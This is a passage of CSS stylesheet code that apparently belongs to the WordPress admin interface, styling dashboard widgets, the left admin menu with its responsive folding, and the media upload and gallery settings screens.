.draft-title{word-wrap:break-word}#dashboard_quick_press .draft-title a,#dashboard_quick_press .draft-title time{margin:0 5px 0 0}#dashboard-widgets h3,#dashboard-widgets h4,#dashboard_quick_press .drafts h2{margin:0 12px 8px;padding:0;font-size:14px;font-weight:400;color:#1d2327}#dashboard_quick_press .drafts h2{line-height:inherit}#dashboard-widgets .inside h3,#dashboard-widgets .inside h4{margin-left:0;margin-right:0}#dashboard_activity .comment-meta span.approve:before{content:"\f227";content:"\f227"/'';font:20px/.5 dashicons;margin-left:5px;vertical-align:middle;position:relative;top:-1px;margin-right:2px}#dashboard_activity .inside{margin:0;padding:0 12px}#dashboard_activity .no-activity{overflow:hidden;padding:12px 0;text-align:center}#dashboard_activity .no-activity p{color:#646970;font-size:16px}#dashboard_activity .subsubsub{float:none;border-top:1px solid #f0f0f1;margin:0 -12px;padding:8px 12px 4px}#dashboard_activity .subsubsub a .count,#dashboard_activity .subsubsub a.current .count{color:#646970}#future-posts ul,#published-posts ul{margin:8px -12px 0 -12px}#future-posts li,#published-posts li{display:grid;grid-template-columns:clamp(160px,calc(2vw + 140px),200px) auto;column-gap:10px;color:#646970;padding:4px 12px}#future-posts li:nth-child(odd),#published-posts li:nth-child(odd){background-color:#f6f7f7}.activity-block{border-bottom:1px solid #f0f0f1;margin:0 -12px 6px -12px;padding:8px 12px 4px}.activity-block:last-child{border-bottom:none;margin-bottom:0}.activity-block .subsubsub li{color:#646970}#activity-widget #the-comment-list div.undo,#activity-widget #the-comment-list tr.undo{background:0 0;padding:6px 0;margin-left:12px}#activity-widget #the-comment-list .comment-item{background:#f6f7f7;padding:12px;position:relative}#activity-widget #the-comment-list .avatar{position:absolute;top:12px}#activity-widget #the-comment-list .dashboard-comment-wrap.has-avatar{padding-left:63px}#activity-widget #the-comment-list .dashboard-comment-wrap blockquote{margin:1em 0}#activity-widget #the-comment-list .comment-item p.row-actions{margin:4px 0 0}#activity-widget #the-comment-list .comment-item:first-child{border-top:1px solid #f0f0f1}#activity-widget #the-comment-list .unapproved{background-color:#fcf9e8}#activity-widget #the-comment-list .unapproved:before{content:"";display:block;position:absolute;left:0;top:0;bottom:0;background:#d63638;width:4px}#activity-widget #the-comment-list .spam-undo-inside .avatar,#activity-widget #the-comment-list .trash-undo-inside .avatar{position:relative;top:0}#dashboard-widgets #dashboard_browser_nag.postbox .inside{margin:10px}.postbox .button-link .edit-box{display:none}.edit-box{opacity:0}.edit-box:focus,.hndle:hover .edit-box{opacity:1}#dashboard-widgets form .input-text-wrap input{width:100%}#dashboard-widgets form .textarea-wrap textarea{width:100%}#dashboard-widgets .postbox form .submit{float:none;margin:.5em 0 0;padding:0;border:none}#dashboard-widgets-wrap #dashboard-widgets .postbox form .submit #publish{min-width:0}#dashboard-widgets .button-link,#dashboard-widgets li a,.community-events-footer a{text-decoration:none}#dashboard-widgets h2 a{text-decoration:underline}#dashboard-widgets .hndle .postbox-title-action{float:right;line-height:1.2}#dashboard_plugins h5{font-size:14px}#latest-comments #the-comment-list{position:relative;margin:0 -12px}#activity-widget #the-comment-list .comment,#activity-widget #the-comment-list .pingback{box-shadow:inset 0 1px 0 rgba(0,0,0,.06)}#activity-widget .comments #the-comment-list .alt{background-color:transparent}#activity-widget #latest-comments #the-comment-list .comment-item{min-height:50px;margin:0;padding:12px}#latest-comments #the-comment-list .pingback{padding-left:12px!important}#latest-comments #the-comment-list .comment-item:first-child{border-top:none}#latest-comments #the-comment-list .comment-meta{line-height:1.5;margin:0;color:#646970}#latest-comments #the-comment-list .comment-meta cite{font-style:normal;font-weight:400}#latest-comments #the-comment-list .comment-item blockquote,#latest-comments #the-comment-list .comment-item blockquote p{margin:0;padding:0;display:inline}#latest-comments #the-comment-list .comment-item p.row-actions{margin:3px 0 0;padding:0;font-size:13px}.rss-widget ul{margin:0;padding:0;list-style:none}a.rsswidget{font-size:13px;font-weight:600;line-height:1.4}.rss-widget ul li{line-height:1.5;margin-bottom:12px}.rss-widget span.rss-date{color:#646970;font-size:13px;margin-left:3px}.rss-widget cite{display:block;text-align:right;margin:0 0 1em;padding:0}.rss-widget cite:before{content:"\2014";content:"\2014"/''}.dashboard-comment-wrap{word-wrap:break-word}#dashboard_browser_nag a.update-browser-link{font-size:1.2em;font-weight:600}#dashboard_browser_nag a{text-decoration:underline}#dashboard_browser_nag p.browser-update-nag.has-browser-icon{padding-right:128px}#dashboard_browser_nag .browser-icon{margin-top:-32px}#dashboard_browser_nag.postbox{background-color:#b32d2e;background-image:none;border-color:#b32d2e;color:#fff;box-shadow:none}#dashboard_browser_nag.postbox h2{border-bottom-color:transparent;background:transparent none;color:#fff;box-shadow:none}#dashboard_browser_nag a{color:#fff}#dashboard_browser_nag.postbox .postbox-header{border-color:transparent}#dashboard_browser_nag h2.hndle{border:none;font-weight:600;font-size:20px;padding-top:10px}.postbox#dashboard_browser_nag p a.dismiss{font-size:14px}.postbox#dashboard_browser_nag a,.postbox#dashboard_browser_nag p,.postbox#dashboard_browser_nag p.browser-update-nag{font-size:16px}#dashboard_php_nag .dashicons-warning{color:#dba617;padding-right:6px}#dashboard_php_nag.php-no-security-updates .dashicons-warning,#dashboard_php_nag.php-version-lower-than-future-minimum .dashicons-warning{color:#d63638}#dashboard_php_nag h2{display:inline-block}#dashboard_php_nag p{margin:12px 0}.bigger-bolder-text{font-weight:600;font-size:14px}@media only screen and (min-width:1600px){.welcome-panel .welcome-panel-column-container{display:flex;justify-content:center}.welcome-panel-column{width:100%;max-width:460px}}@media only screen and (max-width:799px){#wpbody-content #dashboard-widgets .postbox-container{width:100%}#dashboard-widgets .meta-box-sortables{min-height:0}.is-dragging-metaboxes #dashboard-widgets .meta-box-sortables{min-height:100px}#dashboard-widgets .meta-box-sortables.empty-container{margin-bottom:0}}@media only screen and (min-width:800px) and (max-width:1499px){#wpbody-content #dashboard-widgets .postbox-container{width:49.5%}#wpbody-content #dashboard-widgets #postbox-container-2,#wpbody-content #dashboard-widgets #postbox-container-3,#wpbody-content #dashboard-widgets #postbox-container-4{float:right;width:50.5%}#dashboard-widgets #postbox-container-3 .empty-container,#dashboard-widgets #postbox-container-4 .empty-container{border:none;height:0;min-height:0;margin-bottom:0;display:none}#dashboard-widgets #postbox-container-3 .empty-container:after,#dashboard-widgets #postbox-container-4 .empty-container:after{display:none}#wpbody #wpbody-content #dashboard-widgets.columns-1 .postbox-container{width:100%}#wpbody #dashboard-widgets .metabox-holder.columns-1 .postbox-container .empty-container{border:none;height:0;min-height:0;margin-bottom:0}.index-php .columns-prefs,.index-php .screen-layout{display:block}.columns-prefs .columns-prefs-3,.columns-prefs .columns-prefs-4{display:none}#dashboard-widgets .postbox-container .empty-container:after{display:block}}@media only screen and (min-width:1500px) and (max-width:1800px){#wpbody-content #dashboard-widgets .postbox-container{width:33.5%}#wpbody-content #dashboard-widgets #postbox-container-1{width:33%}#wpbody-content #dashboard-widgets #postbox-container-3,#wpbody-content #dashboard-widgets #postbox-container-4{float:right}#dashboard-widgets #postbox-container-4 .empty-container{border:none;height:0;min-height:0;margin-bottom:0;display:none}#dashboard-widgets #postbox-container-4 .empty-container:after{display:none}#dashboard-widgets .postbox-container .empty-container:after{display:block}}@media only screen and (min-width:1801px){#dashboard-widgets .postbox-container .empty-container:after{display:block}}@media screen and (max-width:870px){.welcome-panel .welcome-panel-column li{display:inline-block;margin-right:13px}.welcome-panel .welcome-panel-column ul{margin:.4em 0 0}}@media screen and (max-width:1180px) and (min-width:783px){.welcome-panel-column{grid-template-columns:1fr}.welcome-panel-column>svg,[class*=welcome-panel-icon]{display:none}}@media screen and (max-width:782px){.welcome-panel .welcome-panel-column-container{grid-template-columns:1fr;box-sizing:border-box;padding:32px;width:100%}.welcome-panel .welcome-panel-column-content{max-width:520px}.welcome-panel .welcome-panel-close{overflow:hidden;text-indent:40px;white-space:nowrap;width:20px;height:20px;padding:5px;top:5px;right:5px}.welcome-panel .welcome-panel-close::before{position:absolute;top:5px;left:-35px}#dashboard-widgets h2{padding:12px}#dashboard_recent_comments #the-comment-list .comment-item .avatar{height:30px;width:30px;margin:4px 10px 5px 0}.community-events-toggle-location{height:38px;vertical-align:baseline}#community-events-submit{margin-bottom:0}#dashboard-widgets .community-events-cancel.button-link,.community-events-form label{font-size:14px;line-height:normal;padding:6px 0;border:1px solid transparent}}@media screen and (max-width:600px){.welcome-panel-header{padding:32px 32px 64px}.welcome-panel-header-image{display:none}}@media screen and (max-width:480px){.welcome-panel-column{gap:16px}}@media screen and (max-width:360px){.welcome-panel-column{grid-template-columns:1fr}.welcome-panel-column>svg,[class*=welcome-panel-icon]{display:none}}@media screen and (min-width:355px){.community-events .event-info{display:table-row;float:left;max-width:59%}.event-icon,.event-icon[aria-hidden=true]{display:table-cell}.event-info-inner{display:table-cell}.community-events .event-date-time{float:right;max-width:39%}.community-events .event-date,.community-events .event-time{text-align:right}}#adminmenuback, #adminmenuwrap, #adminmenu, #adminmenu .wp-submenu { width: 160px; background-color: #1d2327; } #adminmenuback { position: fixed; top: 0; bottom: -120px; z-index: 1; /* positive z-index to avoid elastic scrolling woes in Safari */ /* Only visible in Windows High Contrast mode */ outline: 1px solid transparent; } .php-error #adminmenuback { position: absolute; } .php-error #adminmenuback, .php-error #adminmenuwrap { margin-top: 2em; } #adminmenu { clear: left; margin: 12px 0; padding: 0; list-style: none; } .folded #adminmenuback, .folded #adminmenuwrap, .folded #adminmenu, .folded #adminmenu li.menu-top { width: 36px; } /* New Menu icons */ /* hide background-image for icons above */ .menu-icon-dashboard div.wp-menu-image, .menu-icon-post div.wp-menu-image, .menu-icon-media div.wp-menu-image, .menu-icon-links div.wp-menu-image, .menu-icon-page div.wp-menu-image, .menu-icon-comments div.wp-menu-image, .menu-icon-appearance div.wp-menu-image, .menu-icon-plugins div.wp-menu-image, .menu-icon-users div.wp-menu-image, .menu-icon-tools div.wp-menu-image, .menu-icon-settings div.wp-menu-image, .menu-icon-site div.wp-menu-image, .menu-icon-generic div.wp-menu-image { background-image: none !important; } /*------------------------------------------------------------------------------ 7.0 - Main Navigation (Left Menu) ------------------------------------------------------------------------------*/ #adminmenuwrap { position: relative; float: left; z-index: 9990; } /* side admin menu */ #adminmenu * { -webkit-user-select: none; user-select: none; } #adminmenu li { margin: 0; padding: 0; } #adminmenu a { display: block; line-height: 1.3; padding: 2px 5px; color: #f0f0f1; } #adminmenu .wp-submenu a { color: #c3c4c7; color: rgba(240, 246, 252, 0.7); font-size: 13px; line-height: 1.4; margin: 0; padding: 5px 0; } #adminmenu .wp-submenu a:hover, #adminmenu .wp-submenu a:focus { background: none; } #adminmenu a:hover, #adminmenu li.menu-top > a:focus, #adminmenu .wp-submenu a:hover, #adminmenu .wp-submenu a:focus { color: #72aee6; } #adminmenu a:hover, #adminmenu a:focus, .folded #adminmenu .wp-submenu-head:hover { box-shadow: inset 4px 0 0 0 currentColor; transition: box-shadow .1s linear; border-radius: 0; } #adminmenu li.menu-top { border: none; min-height: 34px; position: relative; } #adminmenu .wp-submenu { list-style: none; position: absolute; top: -1000em; left: 160px; overflow: visible; word-wrap: break-word; padding: 6px 0; z-index: 9999; background-color: #2c3338; box-shadow: 0 3px 5px rgba(0, 0, 0, 0.2); } .js #adminmenu .sub-open, .js #adminmenu .opensub .wp-submenu, #adminmenu a.menu-top:focus + .wp-submenu, .no-js li.wp-has-submenu:hover .wp-submenu { top: -1px; } #adminmenu a.wp-has-current-submenu:focus + .wp-submenu { top: 0; } #adminmenu .wp-has-current-submenu .wp-submenu, .no-js li.wp-has-current-submenu:hover .wp-submenu, #adminmenu .wp-has-current-submenu .wp-submenu.sub-open, #adminmenu .wp-has-current-submenu.opensub .wp-submenu { position: relative; z-index: 3; top: auto; left: auto; right: auto; bottom: auto; border: 0 none; margin-top: 0; box-shadow: none; } .folded #adminmenu .wp-has-current-submenu .wp-submenu { box-shadow: 0 3px 5px rgba(0, 0, 0, 0.2); } /* ensure that wp-submenu's box shadow doesn't appear on top of the focused menu item's background. */ #adminmenu li.menu-top:hover, #adminmenu li.opensub > a.menu-top, #adminmenu li > a.menu-top:focus { position: relative; background-color: #1d2327; color: #72aee6; } .folded #adminmenu li.menu-top:hover, .folded #adminmenu li.opensub > a.menu-top, .folded #adminmenu li > a.menu-top:focus { z-index: 10000; } #adminmenu li.wp-has-current-submenu a.wp-has-current-submenu, #adminmenu li.current a.menu-top, #adminmenu .wp-has-current-submenu .wp-submenu .wp-submenu-head { background: #2271b1; color: #fff; } .folded #adminmenu .wp-submenu.sub-open, .folded #adminmenu .opensub .wp-submenu, .folded #adminmenu .wp-has-current-submenu .wp-submenu.sub-open, .folded #adminmenu .wp-has-current-submenu.opensub .wp-submenu, .folded #adminmenu a.menu-top:focus + .wp-submenu, .folded #adminmenu .wp-has-current-submenu a.menu-top:focus + .wp-submenu, .no-js.folded #adminmenu .wp-has-submenu:hover .wp-submenu { top: 0; left: 36px; } .folded #adminmenu a.wp-has-current-submenu:focus + .wp-submenu, .folded #adminmenu .wp-has-current-submenu .wp-submenu { position: absolute; top: -1000em; } #adminmenu .wp-not-current-submenu .wp-submenu, .folded #adminmenu .wp-has-current-submenu .wp-submenu { min-width: 160px; width: auto; border: 1px solid transparent; border-left-width: 5px; } #adminmenu .wp-submenu li.current, #adminmenu .wp-submenu li.current a, #adminmenu .opensub .wp-submenu li.current a, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu li.current a, #adminmenu .wp-submenu li.current a:hover, #adminmenu .wp-submenu li.current a:focus { color: #fff; } #adminmenu .wp-not-current-submenu li > a, .folded #adminmenu .wp-has-current-submenu li > a { padding-right: 16px; padding-left: 14px; /* Exclude from the transition the outline for Windows High Contrast mode */ transition: all .1s ease-in-out, outline 0s; } #adminmenu .wp-has-current-submenu ul > li > a, .folded #adminmenu li.menu-top .wp-submenu > li > a { padding: 5px 12px; } #adminmenu a.menu-top, #adminmenu .wp-submenu-head { font-size: 14px; font-weight: 400; line-height: 1.3; padding: 0; } #adminmenu .wp-submenu-head { display: none; } .folded #adminmenu .wp-menu-name { position: absolute; left: -999px; } .folded #adminmenu .wp-submenu-head { display: block; } #adminmenu .wp-submenu li { padding: 0; margin: 0; } #adminmenu .wp-menu-image img { padding: 9px 0 0; opacity: 0.6; filter: alpha(opacity=60); } #adminmenu div.wp-menu-name { padding: 8px 8px 8px 36px; overflow-wrap: break-word; word-wrap: break-word; -ms-word-break: break-all; word-break: break-word; hyphens: auto; } #adminmenu div.wp-menu-image { float: left; width: 36px; height: 34px; margin: 0; text-align: center; } #adminmenu div.wp-menu-image.svg { background-repeat: no-repeat; background-position: center; background-size: 20px auto; } div.wp-menu-image:before { color: #a7aaad; color: rgba(240, 246, 252, 0.6); padding: 7px 0; transition: all .1s ease-in-out; } #adminmenu div.wp-menu-image:before { color: #a7aaad; color: rgba(240, 246, 252, 0.6); } #adminmenu li.wp-has-current-submenu:hover div.wp-menu-image:before, #adminmenu .wp-has-current-submenu div.wp-menu-image:before, #adminmenu .current div.wp-menu-image:before, #adminmenu a.wp-has-current-submenu:hover div.wp-menu-image:before, #adminmenu a.current:hover div.wp-menu-image:before, #adminmenu li.wp-has-current-submenu a:focus div.wp-menu-image:before, #adminmenu li.wp-has-current-submenu.opensub div.wp-menu-image:before { color: #fff; } #adminmenu li:hover div.wp-menu-image:before, #adminmenu li a:focus div.wp-menu-image:before, #adminmenu li.opensub div.wp-menu-image:before { color: #72aee6; } .folded #adminmenu div.wp-menu-image { width: 35px; height: 30px; position: absolute; z-index: 25; } .folded #adminmenu a.menu-top { height: 34px; } /* Sticky admin menu */ .sticky-menu #adminmenuwrap { position: fixed; } ul#adminmenu a.wp-has-current-submenu { position: relative; } ul#adminmenu a.wp-has-current-submenu:after, ul#adminmenu > li.current > a.current:after { right: 0; border: solid 8px transparent; content: " "; height: 0; width: 0; position: absolute; pointer-events: none; border-right-color: #f0f0f1; top: 50%; margin-top: -8px; } .folded ul#adminmenu li:hover a.wp-has-current-submenu:after, .folded ul#adminmenu li.wp-has-current-submenu:focus-within a.wp-has-current-submenu:after { display: none; } .folded ul#adminmenu a.wp-has-current-submenu:after, .folded ul#adminmenu > li a.current:after { border-width: 4px; margin-top: -4px; } /* flyout menu arrow */ #adminmenu li.wp-has-submenu.wp-not-current-submenu:hover:after, #adminmenu li.wp-has-submenu.wp-not-current-submenu:focus-within:after { right: 0; border: 8px solid transparent; content: " "; height: 0; width: 0; position: absolute; pointer-events: none; top: 10px; z-index: 10000; } .folded ul#adminmenu li.wp-has-submenu.wp-not-current-submenu:hover:after, .folded ul#adminmenu li.wp-has-submenu.wp-not-current-submenu:focus-within:after { border-width: 4px; margin-top: -4px; top: 18px; } #adminmenu li.wp-has-submenu.wp-not-current-submenu.opensub:hover:after, #adminmenu li.wp-has-submenu.wp-not-current-submenu:focus-within:after { border-right-color: #2c3338; } #adminmenu li.menu-top:hover .wp-menu-image img, #adminmenu li.wp-has-current-submenu .wp-menu-image img { opacity: 1; filter: alpha(opacity=100); } #adminmenu li.wp-menu-separator { height: 5px; padding: 0; margin: 0 0 6px; cursor: inherit; } /* @todo: is this even needed given that it's nested beneath the above li.wp-menu-separator? */ #adminmenu div.separator { height: 2px; padding: 0; } #adminmenu .wp-submenu .wp-submenu-head { color: #fff; font-weight: 400; font-size: 14px; padding: 5px 4px 5px 11px; margin: -8px -1px 4px -5px; border-width: 3px 1px 3px 5px; border-style: solid; border-color: transparent; } #adminmenu li.current, .folded #adminmenu li.wp-menu-open { border: 0 none; } /* @todo: consider to use a single rule for these counters and the list table comments counters. */ #adminmenu .menu-counter, #adminmenu .awaiting-mod, #adminmenu .update-plugins { display: inline-block; vertical-align: top; box-sizing: border-box; margin: 1px 0 -1px 2px; padding: 0 5px; min-width: 18px; height: 18px; border-radius: 9px; background-color: #d63638; color: #fff; font-size: 11px; line-height: 1.6; text-align: center; z-index: 26; } #adminmenu li.current a .awaiting-mod, #adminmenu li a.wp-has-current-submenu .update-plugins { background-color: #d63638; color: #fff; } #adminmenu li span.count-0 { display: none; } #collapse-button { display: block; width: 100%; height: 34px; margin: 0; border: none; padding: 0; position: relative; overflow: visible; background: none; color: #a7aaad; cursor: pointer; } #collapse-button:hover { color: #72aee6; } #collapse-button:focus { color: #72aee6; /* Only visible in Windows High Contrast mode */ outline: 1px solid transparent; outline-offset: -1px; } #collapse-button .collapse-button-icon, #collapse-button .collapse-button-label { /* absolutely positioned to avoid 1px shift in IE when button is pressed */ display: block; position: absolute; top: 0; left: 0; } #collapse-button .collapse-button-label { top: 8px; } #collapse-button .collapse-button-icon { width: 36px; height: 34px; } #collapse-button .collapse-button-label { padding: 0 0 0 36px; } .folded #collapse-button .collapse-button-label { display: none; } #collapse-button .collapse-button-icon:after { content: "\f148"; content: "\f148" / ''; display: block; position: relative; top: 7px; text-align: center; font: normal 20px/1 dashicons !important; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } /* rtl:ignore */ .folded #collapse-button .collapse-button-icon:after, .rtl #collapse-button .collapse-button-icon:after { transform: rotate(180deg); } .rtl.folded #collapse-button .collapse-button-icon:after { transform: none; } #collapse-button .collapse-button-icon:after, #collapse-button .collapse-button-label { transition: all .1s ease-in-out; } /** * Toolbar menu toggle */ li#wp-admin-bar-menu-toggle { display: none; } /* Hide-if-customize for items we can't add classes to */ .customize-support #menu-appearance a[href="themes.php?page=custom-header"], .customize-support #menu-appearance a[href="themes.php?page=custom-background"] { display: none; } /* Auto-folding of the admin menu */ @media only screen and (max-width: 960px) { .auto-fold #wpcontent, .auto-fold #wpfooter { margin-left: 36px; } .auto-fold #adminmenuback, .auto-fold #adminmenuwrap, .auto-fold #adminmenu, .auto-fold #adminmenu li.menu-top { width: 36px; } .auto-fold #adminmenu .wp-submenu.sub-open, .auto-fold #adminmenu .opensub .wp-submenu, .auto-fold #adminmenu .wp-has-current-submenu .wp-submenu.sub-open, .auto-fold #adminmenu .wp-has-current-submenu.opensub .wp-submenu, .auto-fold #adminmenu a.menu-top:focus + .wp-submenu, .auto-fold #adminmenu .wp-has-current-submenu a.menu-top:focus + .wp-submenu { top: 0; left: 36px; } .auto-fold #adminmenu a.wp-has-current-submenu:focus + .wp-submenu, .auto-fold #adminmenu .wp-has-current-submenu .wp-submenu { position: absolute; top: -1000em; margin-right: -1px; padding: 6px 0; z-index: 9999; } .auto-fold #adminmenu .wp-has-current-submenu .wp-submenu { min-width: 160px; width: auto; border: 1px solid transparent; border-left-width: 5px; } .auto-fold #adminmenu .wp-has-current-submenu li > a { padding-right: 16px; padding-left: 14px; } .auto-fold #adminmenu li.menu-top .wp-submenu > li > a { padding-left: 12px; } .auto-fold #adminmenu .wp-menu-name { position: absolute; left: -999px; } .auto-fold #adminmenu .wp-submenu-head { display: block; } .auto-fold #adminmenu div.wp-menu-image { height: 30px; width: 34px; position: absolute; z-index: 25; } .auto-fold #adminmenu a.menu-top { min-height: 34px; } .auto-fold #adminmenu li.wp-menu-open { border: 0 none; } .auto-fold #adminmenu .wp-has-current-submenu.menu-top-last { margin-bottom: 0; } .auto-fold ul#adminmenu li:hover a.wp-has-current-submenu:after, .auto-fold ul#adminmenu li:focus-within a.wp-has-current-submenu:after { display: none; } .auto-fold ul#adminmenu li.wp-has-submenu.wp-not-current-submenu:hover:after, .auto-fold ul#adminmenu li.wp-has-submenu.wp-not-current-submenu:focus-within:after { border-width: 4px; margin-top: -4px; top: 16px; } .auto-fold ul#adminmenu a.wp-has-current-submenu:after, .auto-fold ul#adminmenu > li a.current:after { border-width: 4px; margin-top: -4px; } .auto-fold #adminmenu li.menu-top:hover, .auto-fold #adminmenu li.opensub > a.menu-top, .auto-fold #adminmenu li > a.menu-top:focus { z-index: 10000; } .auto-fold #collapse-menu .collapse-button-label { display: none; } /* rtl:ignore */ .auto-fold #collapse-button .collapse-button-icon:after { transform: rotate(180deg); } .rtl.auto-fold #collapse-button .collapse-button-icon:after { transform: none; } } @media screen and (max-width: 782px) { .auto-fold #wpcontent { position: relative; margin-left: 0; padding-left: 10px; } .sticky-menu #adminmenuwrap { position: relative; z-index: auto; top: 0; } /* Sidebar Adjustments */ .auto-fold #adminmenu, .auto-fold #adminmenuback, .auto-fold #adminmenuwrap { position: absolute; width: 190px; z-index: 100; } .auto-fold #adminmenuback { position: fixed; } .auto-fold #adminmenuback, .auto-fold #adminmenuwrap { display: none; } .auto-fold .wp-responsive-open #adminmenuback, .auto-fold .wp-responsive-open #adminmenuwrap { display: block; } .auto-fold #adminmenu li.menu-top { width: 100%; } /* Resize the admin menu items to a comfortable touch size */ .auto-fold #adminmenu li a { font-size: 16px; padding: 5px; } .auto-fold #adminmenu li.menu-top .wp-submenu > li > a { padding: 10px 10px 10px 20px; } /* Restore the menu names */ .auto-fold #adminmenu .wp-menu-name { position: static; } /* Switch the arrow side */ .auto-fold ul#adminmenu a.wp-has-current-submenu:after, .auto-fold ul#adminmenu > li.current > a.current:after { border-width: 8px; margin-top: -8px; } .auto-fold ul#adminmenu li.wp-has-submenu.wp-not-current-submenu:hover:after, .auto-fold ul#adminmenu li.wp-has-submenu.wp-not-current-submenu:focus-within:after { display: none; } /* Make the submenus appear correctly when tapped. */ #adminmenu .wp-submenu { position: relative; display: none; } .auto-fold #adminmenu .selected .wp-submenu, .auto-fold #adminmenu .wp-menu-open .wp-submenu { position: relative; display: block; top: 0; left: -1px; box-shadow: none; } .auto-fold #adminmenu .selected .wp-submenu:after, .auto-fold #adminmenu .wp-menu-open .wp-submenu:after { display: none; } .auto-fold #adminmenu .opensub .wp-submenu { display: none; } .auto-fold #adminmenu .selected .wp-submenu { display: block; } .auto-fold ul#adminmenu li:hover a.wp-has-current-submenu:after, .auto-fold ul#adminmenu li:focus-within a.wp-has-current-submenu:after { display: block; } .auto-fold #adminmenu a.menu-top:focus + .wp-submenu, .auto-fold #adminmenu .wp-has-current-submenu a.menu-top:focus + .wp-submenu { position: relative; left: -1px; right: 0; top: 0; } #adminmenu .wp-not-current-submenu .wp-submenu, .folded #adminmenu .wp-has-current-submenu .wp-submenu, .auto-fold #adminmenu .wp-has-current-submenu .wp-submenu { border: none; } /* Remove submenu headers and adjust sub meu*/ #adminmenu .wp-submenu .wp-submenu-head { display: none; } /* Toolbar menu toggle */ #wp-responsive-toggle { position: fixed; top: 5px; left: 4px; padding-right: 10px; z-index: 99999; border: none; box-sizing: border-box; } #wpadminbar #wp-admin-bar-menu-toggle a { display: block; padding: 0; overflow: hidden; outline: none; text-decoration: none; border: 1px solid transparent; background: none; height: 44px; margin-left: -1px; } .wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle a { background: #2c3338; } li#wp-admin-bar-menu-toggle { display: block; } #wpadminbar #wp-admin-bar-menu-toggle a:hover { border: 1px solid transparent; } #wpadminbar #wp-admin-bar-menu-toggle .ab-icon:before { content: "\f228"; display: inline-block; float: left; font: normal 40px/45px dashicons; vertical-align: middle; outline: none; margin: 0; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; height: 44px; width: 50px; padding: 0; border: none; text-align: center; text-decoration: none; box-sizing: border-box; } .wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle .ab-icon:before { color: #72aee6; } } /* Smartphone */ @media screen and (max-width: 600px) { #adminmenuwrap, #adminmenuback { display: none; } .wp-responsive-open #adminmenuwrap, .wp-responsive-open #adminmenuback { display: block; } .auto-fold #adminmenu { top: 46px; } } /*! This file is auto-generated */ /* Styles for the media library iframe (not used on the Library screen) */ div#media-upload-header { margin: 0; padding: 5px 5px 0; font-weight: 600; position: relative; border-bottom: 1px solid #dcdcde; background: #f6f7f7; } #sidemenu { overflow: hidden; float: none; position: relative; right: 0; bottom: -1px; margin: 0 5px; padding-right: 10px; list-style: none; font-size: 12px; font-weight: 400; } #sidemenu a { padding: 0 7px; display: block; float: right; line-height: 28px; border-top: 1px solid #f6f7f7; border-bottom: 1px solid #dcdcde; background-color: #f6f7f7; text-decoration: none; transition: none; } #sidemenu li { display: inline; line-height: 200%; list-style: none; text-align: center; white-space: nowrap; margin: 0; padding: 0; } #sidemenu a.current { font-weight: 400; padding-right: 6px; padding-left: 6px; border: 1px solid #dcdcde; border-bottom-color: #f0f0f1; background-color: #f0f0f1; color: #000; } #media-upload:after { /* clearfix */ content: ""; display: table; clear: both; } #media-upload .slidetoggle { border-top-color: #dcdcde; } #media-upload input[type="radio"] { padding: 0; } .media-upload-form label.form-help, td.help { color: #646970; } form { margin: 1em; } #search-filter { text-align: left; } th { position: relative; } .media-upload-form label.form-help, td.help { font-family: sans-serif; font-style: italic; font-weight: 400; } .media-upload-form p.help { margin: 0; padding: 0; } .media-upload-form fieldset { width: 100%; border: none; text-align: justify; margin: 0 0 1em; padding: 0; } /* specific to the image upload form */ .image-align-none-label { background: url(../images/align-none.png) no-repeat center right; } .image-align-left-label { background: url(../images/align-left.png) no-repeat center right; } .image-align-center-label { background: url(../images/align-center.png) no-repeat center right; } .image-align-right-label { background: url(../images/align-right.png) no-repeat center right; } tr.image-size td { width: 460px; } tr.image-size div.image-size-item { margin: 0 0 5px; } #library-form .progress, #gallery-form .progress, .insert-gallery, .describe.startopen, .describe.startclosed { display: none; } .media-item .thumbnail { max-width: 128px; max-height: 128px; } thead.media-item-info tr { background-color: transparent; } .form-table thead.media-item-info { border: 8px solid #fff; } abbr.required, span.required { text-decoration: none; border: none; } .describe label { display: inline; } .describe td.error { padding: 2px 8px; } .describe td.A1 { width: 132px; } .describe input[type="text"], .describe textarea { width: 460px; border-width: 1px; border-style: solid; } /* Specific to Uploader */ #media-upload p.ml-submit { padding: 1em 0; } #media-upload p.help, #media-upload label.help { font-family: sans-serif; font-style: italic; font-weight: 400; } #media-upload .ui-sortable .media-item { cursor: move; } #media-upload tr.image-size { margin-bottom: 1em; height: 3em; } #media-upload #filter { width: 623px; } #media-upload #filter .subsubsub { margin: 8px 0; } #media-upload .tablenav-pages a, #media-upload .tablenav-pages .current { display: inline-block; padding: 4px 5px 6px; font-size: 16px; line-height: 1; text-align: center; text-decoration: none; } #media-upload .tablenav-pages a { min-width: 17px; border: 1px solid #c3c4c7; background: #f6f7f7; } #filter .tablenav select { border-style: solid; border-width: 1px; padding: 2px; vertical-align: top; width: auto; } #media-upload .del-attachment { display: none; margin: 5px 0; } .menu_order { float: left; font-size: 11px; margin: 8px 10px 0; } .menu_order_input { border: 1px solid #dcdcde; font-size: 10px; padding: 1px; width: 23px; } .ui-sortable-helper { background-color: #fff; border: 1px solid #a7aaad; opacity: 0.6; filter: alpha(opacity=60); } #media-upload th.order-head { width: 20%; text-align: center; } #media-upload th.actions-head { width: 25%; text-align: center; } #media-upload a.wp-post-thumbnail { margin: 0 20px; } #media-upload .widefat { border-style: solid solid none; } .sorthelper { height: 37px; width: 623px; display: block; } #gallery-settings th.label { width: 160px; } #gallery-settings #basic th.label { padding: 5px 0 5px 5px; } #gallery-settings .title { clear: both; padding: 0 0 3px; font-size: 1.6em; border-bottom: 1px solid #dcdcde; } h3.media-title { font-size: 1.6em; } h4.media-sub-title { border-bottom: 1px solid #dcdcde; font-size: 1.3em; margin: 12px; padding: 0 0 3px; } #gallery-settings .title, h3.media-title, h4.media-sub-title { font-family: Georgia,"Times New Roman",Times,serif; font-weight: 400; color: #50575e; } #gallery-settings .describe td { vertical-align: middle; height: 3em; } #gallery-settings .describe th.label { padding-top: .5em; text-align: right; } #gallery-settings .describe { padding: 5px; width: 100%; clear: both; cursor: default; background: #fff; } #gallery-settings .describe select { width: 15em; } #gallery-settings .describe select option, #gallery-settings .describe td { padding: 0; } #gallery-settings label, #gallery-settings legend { font-size: 13px; color: #3c434a; margin-left: 15px; } #gallery-settings .align .field label { margin: 0 3px 0 1em; } #gallery-settings p.ml-submit { border-top: 1px solid 